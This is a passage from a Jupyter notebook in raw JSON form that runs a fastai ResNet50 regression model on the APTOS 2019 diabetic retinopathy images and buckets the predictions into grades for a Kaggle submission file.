"p = '../input/aptos2019-blindness-detection'\npp = Path(p)\ntrain = pd.read_csv(pp/'train.csv')\ntest = pd.read_csv(pp/'test.csv')\nlen_blnd = len(train)\nlen_blnd_test = len(test)\n\nimg2grd_blnd = [(f'{p_prp}/aptos2019-blindness-detection/train_images/{o[0]}.png',o[1]) for o in train.values]\n\nlen_blnd, len_blnd_test",
"_____no_output_____"
],
[
"img2grd += img2grd_blnd\ndisplay(len(img2grd))\ndisplay(Counter(o[1] for o in img2grd).most_common())",
"_____no_output_____"
],
[
"if np.all([Path(o[0]).exists() for o in img2grd]): print('All files are here!')",
"All files are here!\n"
],
[
"df = pd.DataFrame(img2grd)\ndf.columns = ['fnm', 'target']\n\ndf.shape",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"set_torch_seed()\nidx_blnd_train = np.where(df.fnm.str.contains('aptos2019-blindness-detection/train_images'))[0]\nidx_val = np.random.choice(idx_blnd_train, len_blnd_test, replace=False)\ndf['is_val']=False\ndf.loc[idx_val, 'is_val']=True",
"_____no_output_____"
],
[
"if dbg:\n df=df.head(dbgsz)",
"_____no_output_____"
]
],
[
[
"## dataset",
"_____no_output_____"
]
],
[
[
"tfms = get_transforms(**params_tfms)\n\ndef get_data(sz, bs):\n src = (ImageList.from_df(df=df,path='./',cols='fnm') \n .split_from_df(col='is_val') \n .label_from_df(cols='target', \n label_cls=FloatList)\n )\n\n data= (src.transform(tfms,\n size=sz,\n resize_method=resize_method,\n padding_mode=padding_mode) #Data augmentation\n .databunch(bs=bs,num_workers=2) #DataBunch\n .normalize(imagenet_stats) #Normalize \n )\n return data\n\nbs = BS \nsz = SZ\nset_torch_seed()\ndata = get_data(sz, bs)",
"_____no_output_____"
]
],
[
[
"data.show_batch(rows=3, figsize=(7,6))",
"_____no_output_____"
]
],
[
[
"## model",
"_____no_output_____"
]
],
[
[
"%%time\n# Downloading: \"https://download.pytorch.org/models/resnet50-19c8e357.pth\" to /tmp/.cache/torch/checkpoints/resnet50-19c8e357.pth\n\n# Making pretrained weights work without needing to find the default filename\nif not os.path.exists('/tmp/.cache/torch/checkpoints/'):\n os.makedirs('/tmp/.cache/torch/checkpoints/')\n!cp '../input/pytorch-vision-pretrained-models/resnet50-19c8e357.pth' '/tmp/.cache/torch/checkpoints/resnet50-19c8e357.pth'",
"CPU times: user 6.56 ms, sys: 53.9 ms, total: 60.5 ms\nWall time: 1.01 s\n"
],
[
"set_torch_seed()\nlearn = cnn_learner(data, \n base_arch = models.resnet50, \n path=p_o)\nlearn.loss = MSELossFlat\n\nlearn = learn.load('mdl')",
"_____no_output_____"
],
[
"df_test = pd.read_csv('../input/aptos2019-blindness-detection/test.csv')\ndf_test.head()",
"_____no_output_____"
],
[
"learn.data.add_test(\n ImageList.from_df(df_test,\n f'{p_prp}/aptos2019-blindness-detection/',\n folder='test_images',\n suffix='.png'))",
"_____no_output_____"
],
[
"%%time\n# Predictions for test set\nset_torch_seed()\npreds_tst_tta, _ = learn.TTA(ds_type=DatasetType.Test)",
"_____no_output_____"
],
[
"%%time\n# Predictions for test set\nset_torch_seed()\npreds_tst, _ = learn.get_preds(ds_type=DatasetType.Test)",
"CPU times: user 1.74 s, sys: 1.1 s, total: 2.84 s\nWall time: 1min 3s\n"
],
[
"preds_tst = preds_tst.numpy().squeeze()\npreds_tst_tta = preds_tst_tta.numpy().squeeze()",
"_____no_output_____"
],
[
"np.save(f'{p_o}/preds_tst.npy', preds_tst)\nnp.save(f'{p_o}/preds_tst_tta.npy', preds_tst_tta)",
"_____no_output_____"
],
[
"preds_tst2use = preds_tst_tta",
"_____no_output_____"
],
[
"def bucket(preds_raw, coef = [0.5, 1.5, 2.5, 3.5]):\n preds = np.zeros(preds_raw.shape)\n for i, pred in enumerate(preds_raw):\n if pred < coef[0]:\n preds[i] = 0\n elif pred >= coef[0] and pred < coef[1]:\n preds[i] = 1\n elif pred >= coef[1] and pred < coef[2]:\n preds[i] = 2\n elif pred >= coef[2] and pred < coef[3]:\n preds[i] = 3\n else:\n preds[i] = 4\n return preds",
"_____no_output_____"
],
[
"optnm2qwk = pickle.load(open(f'{p_o}/optnm2qwk.p','rb'))\noptnm2coefs = pickle.load(open(f'{p_o}/optnm2coefs.p','rb'))",
"_____no_output_____"
],
[
"optnm2qwk",
"_____no_output_____"
],
[
"coef = optnm2coefs['abhishek']\npreds_tst_grd = bucket(preds_tst2use, coef)",
"_____no_output_____"
],
[
"Counter(preds_tst_grd.squeeze()).most_common()",
"_____no_output_____"
]
],
[
[
"## submit",
"_____no_output_____"
]
],
[
[
"subm = pd.read_csv(\"../input/aptos2019-blindness-detection/test.csv\")\nsubm['diagnosis'] = preds_tst_grd.squeeze().astype(int)\nsubm.head()",
"_____no_output_____"
],
[
"subm.diagnosis.value_counts()",
"_____no_output_____"
],
[
"subm.to_csv(f\"{p_o}/submission.csv\", index=False)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"raw",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"raw"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
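The APTOS record above treats the 0-4 retinopathy grade as a regression target, buckets the continuous predictions with tuned thresholds, and scores them with quadratic weighted kappa. A compact standalone version of that bucketing-and-scoring step, using the default thresholds rather than the notebook's optimized ones:

```python
import numpy as np
from sklearn.metrics import cohen_kappa_score

def bucket(preds: np.ndarray, thresholds=(0.5, 1.5, 2.5, 3.5)) -> np.ndarray:
    """Map continuous scores to integer grades 0..len(thresholds)."""
    return np.digitize(preds, thresholds)

y_true = np.array([0, 2, 4, 1, 3])
y_raw = np.array([0.2, 1.9, 3.7, 1.4, 2.6])     # e.g. raw regression outputs
y_pred = bucket(y_raw)
qwk = cohen_kappa_score(y_true, y_pred, weights="quadratic")
print(y_pred, round(qwk, 3))                    # [0 2 4 1 3] 1.0
```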
cb52967b2976a727f390fd91a15c50e04b6df003 | 152,685 | ipynb | Jupyter Notebook | kaggle/firstSuccessSubmission.ipynb | younthu/kaggle | 3170e64215dbec04c2f91df91d7be7cb0442c676 | [
"Apache-2.0"
] | null | null | null | kaggle/firstSuccessSubmission.ipynb | younthu/kaggle | 3170e64215dbec04c2f91df91d7be7cb0442c676 | [
"Apache-2.0"
] | null | null | null | kaggle/firstSuccessSubmission.ipynb | younthu/kaggle | 3170e64215dbec04c2f91df91d7be7cb0442c676 | [
"Apache-2.0"
] | null | null | null | 47.32951 | 11,506 | 0.463811 | [
[
[
"# from https://www.kaggle.com/carlbeckerling/kaggle-titanic-tutorial\nimport pandas as pd\n\ntest = pd.read_csv('./test.csv')\ntrain = pd.read_csv('./train.csv')\ntest.shape,train.shape",
"_____no_output_____"
],
[
"test.info()\ntrain.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 418 entries, 0 to 417\nData columns (total 11 columns):\nPassengerId 418 non-null int64\nPclass 418 non-null int64\nName 418 non-null object\nSex 418 non-null object\nAge 332 non-null float64\nSibSp 418 non-null int64\nParch 418 non-null int64\nTicket 418 non-null object\nFare 417 non-null float64\nCabin 91 non-null object\nEmbarked 418 non-null object\ndtypes: float64(2), int64(4), object(5)\nmemory usage: 36.0+ KB\n<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 891 entries, 0 to 890\nData columns (total 12 columns):\nPassengerId 891 non-null int64\nSurvived 891 non-null int64\nPclass 891 non-null int64\nName 891 non-null object\nSex 891 non-null object\nAge 714 non-null float64\nSibSp 891 non-null int64\nParch 891 non-null int64\nTicket 891 non-null object\nFare 891 non-null float64\nCabin 204 non-null object\nEmbarked 889 non-null object\ndtypes: float64(2), int64(5), object(5)\nmemory usage: 83.6+ KB\n"
],
[
"import matplotlib.pyplot as plt\n\nsex_pivot = train.pivot_table(index='Sex', values='Survived')\nsex_pivot.plot.bar()\nplt.show()",
"_____no_output_____"
],
[
"class_pivot = train.pivot_table(index='Pclass', values='Survived')\nclass_pivot.plot.bar()\nplt.show()",
"_____no_output_____"
],
[
"train[\"Pclass\"].unique()",
"_____no_output_____"
],
[
"train['Age'].describe()",
"_____no_output_____"
],
[
"train['Pclass'].describe()",
"_____no_output_____"
],
[
"survived = train[train['Survived'] == 1]\ndied = train[train['Survived'] == 0]\nsurvived['Age'].plot.hist(alpha=0.5,color='red',bins=50)\ndied[\"Age\"].plot.hist(alpha=0.5, color='blue', bins=50)\nplt.legend(['Survived', 'Die','dda'])\nplt.show()",
"_____no_output_____"
],
[
"def process_age(df, cut_points, label_names):\n df['Age'] = df['Age'].fillna(-0.5)\n df['Age_categories'] = pd.cut(df[\"Age\"], cut_points, labels=label_names)\n return df\n\ncut_points = [-1, 0, 18, 100]\nlabel_names = ['Missing', 'Child', 'Adult']\n\ntrain = process_age(train, cut_points, label_names)\ntest = process_age(test, cut_points, label_names)",
"_____no_output_____"
],
[
"train['Age_categories'].describe()\nholdout = process_age(holdout, [-1,0,5,12,18,35,60,100],['Missing','Infant','Child','Teenage', 'Young', 'Adult', 'Senior'])",
"_____no_output_____"
],
[
"train = process_age(train, [-1,0,5,12,18,35,60,100],['Missing','Infant','Child','Teenage', 'Young', 'Adult', 'Senior'])\nage_categories_pivot = train.pivot_table(index='Age_categories', values='Survived')\nage_categories_pivot.plot.bar()\nplt.show()",
"_____no_output_____"
],
[
"def create_dummies(df, column_name):\n dummies = pd.get_dummies(df[column_name], prefix=column_name)\n df = pd.concat([df, dummies], axis=1)\n return df\n\ntrain = create_dummies(train, 'Pclass')\ntest = create_dummies(test, 'Pclass')\ntrain.head()",
"_____no_output_____"
],
[
"train = create_dummies(train, 'Sex')\ntest = create_dummies(test, 'Sex')\n\n\ntrain = create_dummies(train, 'Age_categories')\ntest = create_dummies(test, 'Age_categories')\n\ntrain.head()\ntest.head()",
"_____no_output_____"
]
],
[
[
"# creating learning model",
"_____no_output_____"
]
],
[
[
"from sklearn.linear_model import LogisticRegression\n\nlr = LogisticRegression()\n\ncolumns = ['Pclass_2','Pclass_3', 'Sex_male']\nlr.fit(train[columns], train['Survived'])",
"_____no_output_____"
],
[
"columns = ['Pclass_1', 'Pclass_2', 'Pclass_3', 'Sex_female', 'Sex_male', \n 'Age_categories_Missing', 'Age_categories_Infant',\n 'Age_categories_Child', 'Age_categories_Teenage',\n 'Age_categories_Young', 'Age_categories_Adult',\n 'Age_categories_Senior']\n\nlr.fit(train[columns], train['Survived'])",
"_____no_output_____"
]
],
[
[
"# splitting training data",
"_____no_output_____"
]
],
[
[
"holdout = test\n\nfrom sklearn.model_selection import train_test_split\n\ncolumns = ['Pclass_1', 'Pclass_2', 'Pclass_3', 'Sex_female', 'Sex_male', \n 'Age_categories_Missing', 'Age_categories_Infant',\n 'Age_categories_Child', 'Age_categories_Teenage',\n 'Age_categories_Young', 'Age_categories_Adult',\n 'Age_categories_Senior']\n\nall_X = train[columns]\nall_y = train['Survived']\n\ntrain_X, test_X, train_y, test_y = train_test_split(all_X, all_y, test_size=0.2, random_state=0)",
"_____no_output_____"
],
[
"lr = LogisticRegression()\nlr.fit(train_X, train_y)\npredictions = lr.predict(test_X)",
"_____no_output_____"
],
[
"from sklearn.metrics import accuracy_score\naccuracy = accuracy_score(test_y, predictions)",
"_____no_output_____"
],
[
"accuracy",
"_____no_output_____"
],
[
"from sklearn.metrics import confusion_matrix\n\nconf_matrix = confusion_matrix(test_y, predictions)\npd.DataFrame(conf_matrix, columns=[['Survived', 'Died']], index=[['Survived', 'Died']])",
"_____no_output_____"
],
[
"from sklearn.model_selection import cross_val_score\nimport numpy as np\n\nlr = LogisticRegression()\nscores = cross_val_score(lr, all_X, all_y, cv=10)\nnp.mean(scores)",
"_____no_output_____"
],
[
"holdout = process_age(holdout, [-1,0,5,12,18,35,60,100],['Missing','Infant','Child','Teenage', 'Young', 'Adult', 'Senior'])\nholdout",
"_____no_output_____"
],
[
"columns",
"_____no_output_____"
],
[
"lr = LogisticRegression()\nlr.fit(all_X, all_y)\nholdout_predictions = lr.predict(holdout[columns])\nholdout_predictions",
"_____no_output_____"
],
[
"columns = ['Pclass_1', 'Pclass_2', 'Pclass_3', 'Sex_female', 'Sex_male',\n 'Age_categories_Missing','Age_categories_Infant',\n 'Age_categories_Child', 'Age_categories_Teenage',\n 'Age_categories_Young', 'Age_categories_Adult',\n 'Age_categories_Senior']\nholdout = holdout.drop(['Age_categories_Adult','Age_categories_Child', 'Age_categories_Missing'], axis=1)",
"_____no_output_____"
],
[
"holdout.head()",
"_____no_output_____"
],
[
"holdout['Age_categories'].unique()",
"_____no_output_____"
],
[
"holdout = create_dummies(holdout, 'Age_categories')",
"_____no_output_____"
],
[
"holdout.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 418 entries, 0 to 417\nData columns (total 24 columns):\nPassengerId 418 non-null int64\nPclass 418 non-null int64\nName 418 non-null object\nSex 418 non-null object\nAge 418 non-null float64\nSibSp 418 non-null int64\nParch 418 non-null int64\nTicket 418 non-null object\nFare 417 non-null float64\nCabin 91 non-null object\nEmbarked 418 non-null object\nAge_categories 418 non-null category\nPclass_1 418 non-null uint8\nPclass_2 418 non-null uint8\nPclass_3 418 non-null uint8\nSex_female 418 non-null uint8\nSex_male 418 non-null uint8\nAge_categories_Adult 418 non-null uint8\nAge_categories_Child 418 non-null uint8\nAge_categories_Infant 418 non-null uint8\nAge_categories_Missing 418 non-null uint8\nAge_categories_Senior 418 non-null uint8\nAge_categories_Teenage 418 non-null uint8\nAge_categories_Young 418 non-null uint8\ndtypes: category(1), float64(2), int64(4), object(5), uint8(12)\nmemory usage: 41.7+ KB\n"
],
[
"lr = LogisticRegression()\nlr.fit(all_X, all_y)\nholdout_predictions = lr.predict(holdout[columns])\nholdout_predictions",
"_____no_output_____"
],
[
"holdout_ids = holdout[\"PassengerId\"]\nsubmission_df = {\"PassengerId\": holdout_ids, 'Survived': holdout_predictions}\nsubmission = pd.DataFrame(submission_df)",
"_____no_output_____"
],
[
"submission.to_csv('titanic_submission.csv', index=False)\nsubmission.head()",
"_____no_output_____"
],
[
"holdout = holdout.drop(['Age_categories_Adult'],axis=1)\nholdout.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 418 entries, 0 to 417\nData columns (total 17 columns):\nPassengerId 418 non-null int64\nPclass 418 non-null int64\nName 418 non-null object\nSex 418 non-null object\nAge 418 non-null float64\nSibSp 418 non-null int64\nParch 418 non-null int64\nTicket 418 non-null object\nFare 417 non-null float64\nCabin 91 non-null object\nEmbarked 418 non-null object\nAge_categories 418 non-null category\nPclass_1 418 non-null uint8\nPclass_2 418 non-null uint8\nPclass_3 418 non-null uint8\nSex_female 418 non-null uint8\nSex_male 418 non-null uint8\ndtypes: category(1), float64(2), int64(4), object(5), uint8(5)\nmemory usage: 38.8+ KB\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
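The Titanic record above does its preprocessing (age binning, one-hot dummies) by hand before cross-validating a logistic regression. The same flow can be expressed as one scikit-learn pipeline; the sketch below assumes the usual Kaggle `train.csv` columns and that the file sits in the working directory.

```python
import pandas as pd
from sklearn.compose import ColumnTransformer
from sklearn.impute import SimpleImputer
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import KBinsDiscretizer, OneHotEncoder

train = pd.read_csv("train.csv")
X, y = train[["Pclass", "Sex", "Age"]], train["Survived"]

preprocess = ColumnTransformer([
    # Categorical features become dummy columns, as in the notebook's create_dummies
    ("sex_class", OneHotEncoder(handle_unknown="ignore"), ["Sex", "Pclass"]),
    # Age is imputed, then discretized into bins, mirroring process_age
    ("age", Pipeline([
        ("impute", SimpleImputer(strategy="median")),
        ("bin", KBinsDiscretizer(n_bins=6, encode="onehot-dense")),
    ]), ["Age"]),
])

model = Pipeline([("prep", preprocess), ("clf", LogisticRegression(max_iter=1000))])
print(cross_val_score(model, X, y, cv=10).mean())   # mean 10-fold CV accuracy
```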
cb529a97288deed1f8f876a6ab2036ae4cded4c8 | 310,954 | ipynb | Jupyter Notebook | notebooks/04.2-Clustering-KMeans.ipynb | tardigrde/sklearn_tutorial | 68787c7809c0c5a6bfea82f4e227b0c855c231c2 | [
"BSD-3-Clause"
] | null | null | null | notebooks/04.2-Clustering-KMeans.ipynb | tardigrde/sklearn_tutorial | 68787c7809c0c5a6bfea82f4e227b0c855c231c2 | [
"BSD-3-Clause"
] | null | null | null | notebooks/04.2-Clustering-KMeans.ipynb | tardigrde/sklearn_tutorial | 68787c7809c0c5a6bfea82f4e227b0c855c231c2 | [
"BSD-3-Clause"
] | null | null | null | 590.045541 | 157,580 | 0.948346 | [
[
[
"<small><i>This notebook was put together by [Jake Vanderplas](http://www.vanderplas.com). Source and license info is on [GitHub](https://github.com/jakevdp/sklearn_tutorial/).</i></small>",
"_____no_output_____"
],
[
"# Clustering: K-Means In-Depth",
"_____no_output_____"
],
[
"Here we'll explore **K Means Clustering**, which is an unsupervised clustering technique.\n\nWe'll start with our standard set of initial imports",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\n\nplt.style.use('seaborn')",
"_____no_output_____"
]
],
[
[
"## Introducing K-Means",
"_____no_output_____"
],
[
"K Means is an algorithm for **unsupervised clustering**: that is, finding clusters in data based on the data attributes alone (not the labels).\n\nK Means is a relatively easy-to-understand algorithm. It searches for cluster centers which are the mean of the points within them, such that every point is closest to the cluster center it is assigned to.\n\nLet's look at how KMeans operates on the simple clusters we looked at previously. To emphasize that this is unsupervised, we'll not plot the colors of the clusters:",
"_____no_output_____"
]
],
[
[
"from sklearn.datasets.samples_generator import make_blobs\nX, y = make_blobs(n_samples=300, centers=4,\n random_state=0, cluster_std=0.60)\nplt.scatter(X[:, 0], X[:, 1], s=50);",
"_____no_output_____"
]
],
[
[
"By eye, it is relatively easy to pick out the four clusters. If you were to perform an exhaustive search for the different segmentations of the data, however, the search space would be exponential in the number of points. Fortunately, there is a well-known *Expectation Maximization (EM)* procedure which scikit-learn implements, so that KMeans can be solved relatively quickly.",
"_____no_output_____"
]
],
[
[
"from sklearn.cluster import KMeans\nest = KMeans(4) # 4 clusters\nest.fit(X)\ny_kmeans = est.predict(X)\nplt.scatter(X[:, 0], X[:, 1], c=y_kmeans, s=50, cmap='rainbow');",
"_____no_output_____"
]
],
[
[
"The algorithm identifies the four clusters of points in a manner very similar to what we would do by eye!",
"_____no_output_____"
],
[
"## The K-Means Algorithm: Expectation Maximization\n\nK-Means is an example of an algorithm which uses an *Expectation-Maximization* approach to arrive at the solution.\n*Expectation-Maximization* is a two-step approach which works as follows:\n\n1. Guess some cluster centers\n2. Repeat until converged\n A. Assign points to the nearest cluster center\n B. Set the cluster centers to the mean \n \nLet's quickly visualize this process:",
"_____no_output_____"
]
],
[
[
"from fig_code import plot_kmeans_interactive\nplot_kmeans_interactive();",
"_____no_output_____"
]
],
[
[
"This algorithm will (often) converge to the optimal cluster centers.",
"_____no_output_____"
],
[
"### KMeans Caveats\n\nThe convergence of this algorithm is not guaranteed; for that reason, scikit-learn by default uses a large number of random initializations and finds the best results.\n\nAlso, the number of clusters must be set beforehand... there are other clustering algorithms for which this requirement may be lifted.",
"_____no_output_____"
],
[
"## Application of KMeans to Digits\n\nFor a closer-to-real-world example, let's again take a look at the digits data. Here we'll use KMeans to automatically cluster the data in 64 dimensions, and then look at the cluster centers to see what the algorithm has found.",
"_____no_output_____"
]
],
[
[
"from sklearn.datasets import load_digits\ndigits = load_digits()",
"_____no_output_____"
],
[
"est = KMeans(n_clusters=10)\nclusters = est.fit_predict(digits.data)\nest.cluster_centers_.shape",
"_____no_output_____"
]
],
[
[
"We see ten clusters in 64 dimensions. Let's visualize each of these cluster centers to see what they represent:",
"_____no_output_____"
]
],
[
[
"fig = plt.figure(figsize=(8, 3))\nfor i in range(10):\n ax = fig.add_subplot(2, 5, 1 + i, xticks=[], yticks=[])\n ax.imshow(est.cluster_centers_[i].reshape((8, 8)), cmap=plt.cm.binary)",
"_____no_output_____"
]
],
[
[
"We see that *even without the labels*, KMeans is able to find clusters whose means are recognizable digits (with apologies to the number 8)!\n\nThe cluster labels are permuted; let's fix this:",
"_____no_output_____"
]
],
[
[
"from scipy.stats import mode\n\nlabels = np.zeros_like(clusters)\nfor i in range(10):\n mask = (clusters == i)\n labels[mask] = mode(digits.target[mask])[0]",
"_____no_output_____"
]
],
[
[
"For good measure, let's use our PCA visualization and look at the true cluster labels and K-means cluster labels:",
"_____no_output_____"
]
],
[
[
"from sklearn.decomposition import PCA\n\nX = PCA(2).fit_transform(digits.data)\n\nkwargs = dict(cmap = plt.cm.get_cmap('rainbow', 10),\n edgecolor='none', alpha=0.6)\nfig, ax = plt.subplots(1, 2, figsize=(8, 4))\nax[0].scatter(X[:, 0], X[:, 1], c=labels, **kwargs)\nax[0].set_title('learned cluster labels')\n\nax[1].scatter(X[:, 0], X[:, 1], c=digits.target, **kwargs)\nax[1].set_title('true labels');",
"_____no_output_____"
]
],
[
[
"Just for kicks, let's see how accurate our K-Means classifier is **with no label information:**",
"_____no_output_____"
]
],
[
[
"from sklearn.metrics import accuracy_score\naccuracy_score(digits.target, labels)",
"_____no_output_____"
]
],
[
[
"80% – not bad! Let's check-out the confusion matrix for this:",
"_____no_output_____"
]
],
[
[
"from sklearn.metrics import confusion_matrix\nprint(confusion_matrix(digits.target, labels))\n\nplt.imshow(confusion_matrix(digits.target, labels),\n cmap='Blues', interpolation='nearest')\nplt.colorbar()\nplt.grid(False)\nplt.ylabel('true')\nplt.xlabel('predicted');",
"[[177 0 0 0 1 0 0 0 0 0]\n [ 0 55 24 1 0 1 2 0 99 0]\n [ 1 2 147 13 0 0 0 4 8 2]\n [ 0 0 0 154 0 2 0 7 7 13]\n [ 0 3 0 0 165 0 0 11 2 0]\n [ 0 0 0 0 2 136 1 0 0 43]\n [ 1 0 0 0 0 0 177 0 3 0]\n [ 0 2 0 0 0 0 0 175 2 0]\n [ 0 6 3 2 0 4 2 5 100 52]\n [ 0 20 0 6 0 6 0 8 1 139]]\n"
]
],
[
[
"Again, this is an 80% classification accuracy for an **entirely unsupervised estimator** which knew nothing about the labels.",
"_____no_output_____"
],
[
"## Example: KMeans for Color Compression\n\nOne interesting application of clustering is in color image compression. For example, imagine you have an image with millions of colors. In most images, a large number of the colors will be unused, and conversely a large number of pixels will have similar or identical colors.\n\nScikit-learn has a number of images that you can play with, accessed through the datasets module. For example:",
"_____no_output_____"
]
],
[
[
"from sklearn.datasets import load_sample_image\nchina = load_sample_image(\"china.jpg\")\nplt.imshow(china)\nplt.grid(False);",
"_____no_output_____"
]
],
[
[
"The image itself is stored in a 3-dimensional array, of size ``(height, width, RGB)``:",
"_____no_output_____"
]
],
[
[
"china.shape",
"_____no_output_____"
]
],
[
[
"We can envision this image as a cloud of points in a 3-dimensional color space. We'll rescale the colors so they lie between 0 and 1, then reshape the array to be a typical scikit-learn input:",
"_____no_output_____"
]
],
[
[
"X = (china / 255.0).reshape(-1, 3)\nprint(X.shape)",
"_____no_output_____"
]
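,
[
"# Added illustration: the reshaped array really is a cloud of points in 3-dimensional color space.\n# Here we plot a random subsample of the pixels, coloring each point by its own (R, G, B) value.\nfrom mpl_toolkits.mplot3d import Axes3D\nrng = np.random.RandomState(0)\nidx = rng.choice(X.shape[0], 2000, replace=False)\nax = plt.figure(figsize=(6, 6)).add_subplot(111, projection='3d')\nax.scatter(X[idx, 0], X[idx, 1], X[idx, 2], c=X[idx], s=4)\nax.set_xlabel('R'); ax.set_ylabel('G'); ax.set_zlabel('B');",
"_____no_output_____"
]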
],
[
[
"We now have 273,280 points in 3 dimensions.\n\nOur task is to use KMeans to compress the $256^3$ colors into a smaller number (say, 64 colors). Basically, we want to find $N_{color}$ clusters in the data, and create a new image where the true input color is replaced by the color of the closest cluster.\n\nHere we'll use ``MiniBatchKMeans``, a more sophisticated estimator that performs better for larger datasets:",
"_____no_output_____"
]
],
[
[
"from sklearn.cluster import MiniBatchKMeans",
"_____no_output_____"
],
[
"# reduce the size of the image for speed\nn_colors = 64\n\nX = (china / 255.0).reshape(-1, 3)\n \nmodel = MiniBatchKMeans(n_colors)\nlabels = model.fit_predict(X)\ncolors = model.cluster_centers_\nnew_image = colors[labels].reshape(china.shape)\nnew_image = (255 * new_image).astype(np.uint8)\n\n# create and plot the new image\nwith plt.style.context('seaborn-white'):\n plt.figure()\n plt.imshow(china)\n plt.title('input: 16 million colors')\n\n plt.figure()\n plt.imshow(new_image)\n plt.title('{0} colors'.format(n_colors))",
"_____no_output_____"
]
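,
[
"# Added back-of-the-envelope check on the \"compression\" framing: each original pixel needs 24 bits\n# (three 8-bit channels), while indexing into a 64-color palette needs only 6 bits per pixel plus the\n# tiny palette itself, so the pixel data shrinks by roughly a factor of four.\nn_pixels = X.shape[0]\noriginal_bits = n_pixels * 24\ncompressed_bits = n_pixels * 6 + n_colors * 24\nprint(\"original: %.0f KB, palette-compressed: %.0f KB\" % (original_bits / 8 / 1024., compressed_bits / 8 / 1024.))",
"_____no_output_____"
]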
],
[
[
"Compare the input and output image: we've reduced the $256^3$ colors to just 64.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
]
] |
cb52c81cdaa326e10d80c73b5d7b70ca35c723ee | 10,112 | ipynb | Jupyter Notebook | notebooks/ipynb/dlt_workflow_refactored_unit_tests.ipynb | simondale/databricks-testing | 711a8789ea27af323676cff6f0bfd00675abcc0c | [
"MIT"
] | 6 | 2021-08-24T19:41:10.000Z | 2022-01-02T13:58:53.000Z | notebooks/ipynb/dlt_workflow_refactored_unit_tests.ipynb | simondale/databricks-testing | 711a8789ea27af323676cff6f0bfd00675abcc0c | [
"MIT"
] | null | null | null | notebooks/ipynb/dlt_workflow_refactored_unit_tests.ipynb | simondale/databricks-testing | 711a8789ea27af323676cff6f0bfd00675abcc0c | [
"MIT"
] | 1 | 2021-08-25T07:01:47.000Z | 2021-08-25T07:01:47.000Z | 5,056 | 10,111 | 0.667623 | [
[
[
"%run ./dlt",
"_____no_output_____"
],
[
"%run ./dlt_workflow_refactored",
"_____no_output_____"
],
[
"from pyspark.sql import Row\nimport unittest",
"_____no_output_____"
],
[
"from pyspark.sql.functions import lit\nimport datetime\n\n\ntimestamp = datetime.datetime.fromisoformat(\"2000-01-01T00:00:00\")\n\n\ndef timestamp_provider():\n return lit(timestamp)",
"_____no_output_____"
],
[
"from pyspark.sql.functions import when, col\nfrom pyspark.sql import Row\n\n\nclass FunctionUnitTests(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n container.register(\n timestamp_provider=timestamp_provider\n )\n \n def test_add_ingest_columns(self):\n df = spark.range(1)\n df = df.transform(container.add_ingest_columns)\n result = df.collect()\n self.assertEqual(1, len(result), \"Only one record expected\")\n self.assertIn(\"ingest_timestamp\", df.columns, \"Ingest timestamp column not present\")\n self.assertIn(\"ingest_source\", df.columns, \"Ingest source column not present\")\n self.assertEqual(url.split(\"/\")[-1], result[0].ingest_source, \"Ingest source not correct\")\n self.assertEqual(timestamp, result[0].ingest_timestamp, \"Ingest timestamp not correct\")\n \n def test_add_processed_timestamp(self):\n df = spark.range(1)\n df = df.transform(container.add_processed_timestamp)\n result = df.collect()\n self.assertEqual(1, len(result), \"Only one record expected\")\n self.assertIn(\"processed_timestamp\", df.columns, \"Processed timestamp column not present\")\n self.assertEqual(timestamp, result[0].processed_timestamp, \"Processed timestamp not correct\")\n \n def 